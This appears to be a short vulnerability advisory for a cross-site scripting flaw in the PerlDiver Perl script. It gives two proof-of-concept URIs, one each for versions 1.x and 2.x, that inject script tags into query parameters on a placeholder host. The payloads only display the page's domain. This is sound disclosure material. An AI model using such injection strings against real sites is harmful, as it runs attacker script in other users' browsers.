|
|
PerlDiver Perldiver.CGI Cross-Site Scripting Vulnerability
No exploit is required. Proof of concept URI have been provided: Version 1.x ------ http://www.example.com/[path]/perldiver.pl?testhere<SCRIPT>alert(document.domain);</SCRIPT> version 2.x ------ http://www.example.com/[path]/perldiver.cgi?action=2020&module=<script>document.write(document.domain)</script> |
|
Privacy Statement |